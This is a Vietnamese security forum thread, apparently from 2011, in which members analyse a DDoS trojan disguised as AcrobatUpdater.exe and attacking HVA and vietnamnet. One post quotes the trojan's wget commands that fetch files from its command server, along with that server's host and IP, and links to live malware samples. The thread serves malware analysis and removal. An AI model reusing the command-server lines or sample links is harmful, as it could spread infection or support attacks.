Mấy ngày gần đây theo dõi trên mang, chúng ta luôn thấy tình trang khó hay không truy cập đươc vào vietnamnet. Luôn hiện ra HTTP error code 503- Service unavailable (Dịch vụ không sẵn sàng đáp ứng cho người truy cập)' Lỗi 503 là lỗi về phía server (webserver) mà nguyên nhân chính là do nó bị quá tải (overload).
Đọc một bài của TQN trong topic này, thấy thông báo là DDoS tool của STL tấn công vào một URL nằm "sâu" trong website, đó là URL:
http://danlambaovn.blogspot.com/2011/08/mong-anh-ung-la-tay-sai-cua-duch-thu.html
tôi hơi ngạc nhiên. Theo dõi diễn biến nhiều quá trình DDos tại VN và thế giới, tôi thấy rất ít khi mang bot tấn công vào một URL (trang web) nằm "sâu" đến thế, thường chúng chỉ tấn công vào trang mở đầu (thường là trang chủ) chủ hay trang kế tiếp. Có nhiều lý do, trong đó có lý do là hacker phải mất nhiều thời gian để xem toàn bộ nội dung của website, để tìm ra đúng trang (URL) cần đánh. DDoS hacker bình thường thì chả ai mất công tìm tòi như vậy cả. Chỉ có "Political DDoS" thì có thể (từ mới chế của PXMMRF-HVA đấy nhé)
Hôm nay (23-8-2011), vào vietnamnet.net xem, thấy truy cập hơi chậm. Chắc vietnamnet lại bị STL tân công DDoS đây, nhưng cường độ không cao. Hay chưa đến lúc cao nhỉ? Hỉ hì.
Có 3 tiểu mục quan trong ở dưới một cửa sổ Flash trên trang chủ:
.Chủ tịch nước: Tên tuổi Tướng Giáp mãi đi vào lịch sử
.Biểu tình ở Đại Liên và tiếng nói người dân
.Đừng để có nhiều 'nghị sĩ rau muống'
Các tiểu muc này truy cập để xem rất khó và rất chậm so với các muc khác trên trang chủ. Tiểu mục 1 (Chủ tịch nước: Tên tuổi Tướng Giáp mãi đi vào lịch sử) thì đặt ở directory: http://vietnamnet.vn/vn/chinh-tri/36413/chu-tich-nuoc--ten-tuoi-tuong-giap-mai-di-vao-lich-su.html , tiểu mục 3 thì ở: http://vietnamnet.vn/vn/chinh-tri/36384/dung-de-co-nhieu--nghi-si-rau-muong-.html . Hai tiễu muc này truy cập đến rất chậm, nhưng bài viết vẫn còn hiện ra được, sau khi kiên nhẫn chờ đợi.
Còn tiểu mục 2: Biểu tình ở Đại Liên và tiếng nói người dân (có vẻ nhạy cảm đây!) , thì không thể nào truy cập được, chờ lâu không hiện ra một chữ, luôn time-out. Nghĩa là: wait for nothing.
Chắc là tiểu mục 2 này nằm ở directory: http://vietnamnet.vn/vn/chinh-tri/36xxx/bieu-tinh-o-dai-lien-va-tieng-noi-nguoi-dan.html?
Không rõ có phải các bác STL có đang nhằm DDoS vào đúng trang (URL) này không? Y như các bác đã làm trường hợp tấn công website danlambao ấy, như nói ở trên.
Tất nhiên chỉ có các admin. của Vietnamnet mới trả lời chính xác câu hỏi này. Đúng không các bác?
|
|
|
|
TQN wrote:
Chắc có lẽ đây cũng là một chủ ý của stl. DDOS không được thì "bố mày" khỏi vào xem luôn. Thâm hiểm thật !
Bà con down file killstlmeoque.cmd ở đây: http://www.mediafire.com/?z3atx20ilxpebop. Run nó, đừng hỏi em là run làm sao thì em bó tay luôn. Bat file này chỉ dùng lệnh dir, rd, del, tool reg.exe, sc.exe, taskkill.exe. Hầu như là có sẵn trên mọi máy hết.
Text nó ở đây nếu các bạn down không được, chịu khó copy-paste-save nhé
............................................
Hoan hô TQN
Thưc ra cái công lớn ở đây là việc TQN tìm ra các file DDoS tool của STL. Chứ việc viết một STL Virus Removal tool thì không phải là khó hay công lao to tát gì. Nhưng nếu viết quen (như các bác ở BKAV hay CMC) thì viết nhanh và đủ hơn.
Ngoài ra có một điểm lưu ý là nếu chỉ đơn thuần delete ngay các process hay file AcrobatUpdater.exe thôi thì hình như không được. Phải có thêm đông tác "ngắt" trước các kết nối của nó với các file và service khác ( như kiểu unlocker.exe làm ấy). Và sau đó phải cần reboot lai máy (vì AcrobatUpdater.exe luôn được load lên bộ nhớ của máy). Chắc các file (process) MsHelpCenter.exe cũng như vậy. Nên chắc TQN phải bổ sung thêm vài codes nữa
|
|
|
|
Việc submit các mẫu virus-trojan của STL lên các international antivirus companies là điều cần thiết.
Tuy nhiên nếu chúng ta có thể viết ra một Virus removal tool nhỏ để quét và diệt các STL virus- trojan trong hệ thống trong đó có AcrobatUpdater.exe, jarlib.dll (đi kèm với AcrobatUpdater.exe), SbieSvc.exe, SbieMgm.dl (đi kèm với SbieSvc.exe),
MsHelpCenter.exe, ...............(đi kèm với MsHelpCenter.exe)... vân vân thì hay hơn và có dấu ấn của các chuyên gia bảo mật VN. Các bạn ở BKAV và CMC có thể giúp việc này không. Ks Triệu trần Đức (Tổng giám đôc Security CMC)ơi, em có chỉ đạo việc này giúp anh hay không nhỉ? Thank you in advance.
Các file MsHelpCenter.exe, AcrobatUpdater.exe (newly modified) và SbieSvc.exe cần được gọi tên đúng là các "DDoS tool" được cài lén trong hệ thống, như các chuyên gia bảo mật quốc tế ở lĩnh vực này thường gọi như vậy(Khi submit tới các công ty antivirus ,xin dùng tên này để họ dễ nhận định).
MsHelpCenter.exe đã đươc thử trên máy thử nghiệm của tôi, nhưng quá trình DDoS vào một mục tiêu nào đó không diễn ra. Lý do chưa được xác định. Đề nghị các bạn khác cùng tôi phối kiểm việc này.
SbieSvc.exe (kèm với SbieMgm.dll) sắp được thử nghiệm trên máy của tôi. Có kết quả tôi sẽ thông báo cụ thể cho các bạn.
--------
Riêng về file (process) của Trojan TRJ/hvadetec-1 (tức là newly revised AcrobatUpdater.exe) xin thông báo thêm một số thông tin bổ sung:
1- Sau khi tấn công vào webserver chính của HVA đặt tai Mỹ (website của HVA cùng hosting chung một webserver với tienve.org), TRJ/hvadetec-1 (AcrobatUpdater.exe) chuyển sang tấn công vào webserver mới của HVA, đặt tại Đức và sau cùng chuyển sang tấn công vào webserver thứ ba của HVA đặt tại Nhật.
2- Sở di STL DDoS tool tấn công vào các webserver khác nhau của HVA là do HVA đã chủ đông áp dụng kỹ thuật Round- robin (RR) DNS, để phân tải theo thời gian cho các webserver. Không phải là kỹ thuật mới, mà STL vừa áp dụng cho DDOS tool họ đâu!
3- Nhịp độ tấn công của STL DDoS tool trên một máy cũng khá nhanh và mạnh, có thể từ 4-10 kết nối trong một giây (tuỳ theo cấu hình máy mạnh hay yếu). Các gói tin DDoS tấn công vào mục tiêu đều là SYN packet, có dung lượng khoảng 62 Bytes. Tuy nhiên thưc tế trên mạng không có nhiều máy tham gia vào quá trình cùng DDoS vào HVA. Có nhiều lý do, trong đó có lý do là mạng bot của STL đã tổn thất nhiều và STL nhiều lúc đã mất khả năng điều khiển chúng.
4- Sau một thời gian hoat động (tấn công DDoS vào mục tiêu) các DDoS tool của STL (AcrobatUpdater.exe)
dễ dàng rơi vào trạng thái "Loopback". Điều này xuất phát từ "lỗi kỹ thuật" rõ ràng trong quá trình biên soạn (code) process này.
Ngoài ra TRJ/hvadetec-1 (AcrobatUpdater.exe) khi chạy chiếm một năng lưc rất lớn của CPU (khoảng từ 15-45 %- rất nhiều lúc là 42%). Do vậy khi user khởi phát một service khác, thí dụ xem video trên mạng hay quét virus hệ thống, thì tốc độ DDoS của AcrobatUpdater.exe chậm hẳn lai hoăc temporarily stopped.
5- TRong quá trình DDoS, TRJ/hvadetec-1 có kết nối với một webserver của STL để được update dữ liệu. Đó chính là webserver high.paploz.com mà anh TQN đã phát hiện trong quá trình RCE file AcrobatUpdater.exe, chứ không phải là http://net.iadze.com. Socket kết nôi đến cổng 80 TCP HTTP của webserver trên để download về máy nạn nhân file xv.jpg (xem hình minh hoạ). Trên máy thử nghiệm của tôi kết nối này xảy ra vào ngày 21-8-2011 (chủ nhật), nhưng khi kiểm tra file này trên máy và kiểm tra file xv.jpg này download từ high.paploz.com vào sáng hôm nay (22-8), thì khi mở ra nôi dung file này vẫn còn là: "2011-08-18 15:22:46"
Đây là triệu chứng rõ ràng STL đã bối rối và mất dần quyền điều khiển mang bot của họ
Xin xem thêm các hình minh hoạ:
Tấn công DDoS vào webserver của HVA tại Đức
Tấn công DDoS vào webserver của HVA tại Nhật
TRJ/hvadetec-1 (AcrobatUpdater.exe) kết nối với high.paploz.com
|
|
|
|
Theo thông lệ quốc tế, HVA chúng tôi đặt tên trojạn này là TRJ/hvadetec-1
(Xin anh conmale và TQN góp ý thêm)
Virus-Trojan do các hacker mũ đen bất kỳ, nào đó tạo ra và gây lây nhiễm trên mạng (trường hợp này là STL), tổ chức phát hiện đầu tiên ra nó và tư vấn cách diệt nó trong hệ thống máy, có quyền đặt tên cho nó.
Trân trọng đề nghi các công ty Antivius, đăc biệt là các công ty VN tôn trọng thông lệ này.
Xin anh TQN và acoutic...RCE kỹ nó và tư vấn cách diệt đơn giản, hiệu quả nhất mà một user thông thường có thể áp dụng. Nên viết một "Virus-Trojan Removal tool" nhỏ để diệt con này và có thể cả các trojan-virus khác của STL và phổ biến trên mạng
Chúng tôi (conmale, TQN và tôi) đang tiếp tục tìm hiểu thêm về Trojan đang tấn công vào vietnamnet.net, tờ báo mạng chúng tôi có cảm tình
|
|
|
|
Tôi đã tìm ra file virus (process) hiện đang tấn công vào HVA
Process này mở rất nhiều và liên tục các thread (cổng TCP) kết nối- tấn công vào cổng 80 TCP của website HVA.
Nhịp độ tấn công khá mạnh, khoảng 5-6 kết nối trong một giây (với máy có cấu hình thấp, tốc độ CPU chậm-máy tôi đang thí nghiệm). Gói tin tấn công có dung lương từ 25-62 Bytes.
Quá trình tấn công này không thông qua trình duyệt mà từ process tấn công thẳng vào cổng 80 TCP của HVA webserver.
Ngay khi bị nhiễm vào máy process khởi phát tự động quá trình tấn công và cũng tự kích hoat khi máy khởi đông lại.
Tuy vẫn dùng tên file (process) cũ, là AcrobatUpdater.exe, nhưng đây lai là file có cấu trúc mới. Chúng hoàn toàn không bị Avira antivirus phát hiện khi đươc cài vào máy và ngay cả khi scan thẳng vào file.
(AcrobatUpdater.exe cũ - TQN cung cấp vào khoảng 28-7-2011 và 5-8-2011 bị Avira Antivirus phát hiện dễ dàng)
File virus này có tên là "AcrobatUpdater_20_08_2011" (theo anh TQN đặt lúc upload lên mạng)
Có lẽ đây cũng là file (process) vừa mới đây tấn công DDoS vào vietnamnet.net
|
|
|
|
TQN wrote:
Từ từ mình sẽ post sau, mẫu của stl thì nhiều lắm, phân tích hoạt động của chỉ 1 file thôi đã mấy chục tấm hình rồi.
Bà con thân mến, sau khi second.dinest.com die, giờ stl lại nhảy qua Nhật, thuê webserver bên đó để đặt xc.jpg và xv.jpg:
Code:
wget -t3 "http://high.paploz.com/xv.jpg" -U"An0nym0453"
wget -t3 "http://high.paploz.com/xc.jpg" -U"An0nym0453"
Host high.paploz.com có IP: 46.166.147.48. Nhờ anh PXMMRF kiểm tra host này.
top.jpg, xc.jpg, xv.jpg được đặt lên webserver vào ngày 18-10-2011, 3h chiều.
File AcrobatUpdater.exe này có modify code một số, nhưng cơ bản vẫn là VB và các phương thức tấn công bằng HTTP protocol dùng socket.
File ngày 15-08-2011: http://www.mediafire.com/?vp9spwf2bnx7e5i
File ngày 20-08-2011: http://www.mediafire.com/?6qj9841rxvone83
Có đây TQN à.
high.paploz.com
Whois---> privacy protected
- IP 46.166.147.48
- Trên webserver chỉ hosting một website này (high.paploz.com)
- Web server (Trình quản lý website) NGINX 1.1.0 ( giống như các webserver khác của STL)
- Sử dụng các nameserver như các webserver khác của STL. Có vẻ như STL có mối liên quan chặt chẽ với công ty quản lý nameserver, hay có tay trong ở đây. Nên việc chuyển IP cho webserver (điều chỉnh Record A) thuận lơi và nhanh chóng hơn bình thường.
- Địa chỉ đặt webserver: NGA (Russian)
- Webserver mở cổng 80 TCP HTTP (webser được cài đặt vào khoảng 5,6-8-2011, mở ngày nào thì không rõ)
- File top.jpg đã bị removed (5.00PM 20-8-2011)
- File xv.jpg chỉ là 1 file .txt bình thường value của nó là: 2011-08-18 15:22:46
(Có lẽ đây là giờ tấn công vào một website nào đó? )
- File xc.jpg -đươc protected- nhờ TQN RCE giùm. Thanks
Xem visual route
Special Note: Chỉ là giỡn chơi. Đố các bạn trong hình visual route mà tôi post trên đây có chứa(embedded) cái gì. Nôi dung thế nào. Ai biết xin hậu tạ chầu bia. Chỉ là giỡn vui cho giảm stress chút ít thôi. Hì hì.
|
|
|
|
|
|
|
|
![[Rule]](/hvaonline/templates/viet/images/icon_mini_rule.gif "[Rule]"){kind=icon}
![[Home]](/hvaonline/templates/viet/images/icon_mini_groups.gif "[Home]"){kind=icon}
![[Portal]](/hvaonline/templates/viet/images/icon_mini_portal.gif "[Portal]"){kind=icon}
![[Members]](/hvaonline/templates/viet/images/icon_mini_members.gif "[Members]"){kind=icon}
![[Statistics]](/hvaonline/templates/viet/images/icon_mini_stats.gif "[Statistics]"){kind=icon}
![[Search]](/hvaonline/templates/viet/images/icon_mini_search.gif "[Search]"){kind=icon}
![[Reading Room]](/hvaonline/templates/viet/images/icon_mini_book.gif "[Reading Room]"){kind=icon}
![[Register]](/hvaonline/templates/viet/images/icon_mini_register.gif "[Register]"){kind=icon}
Register![[Login]](/hvaonline/templates/viet/images/icon_mini_login.gif "[Login]"){kind=icon}
Login [
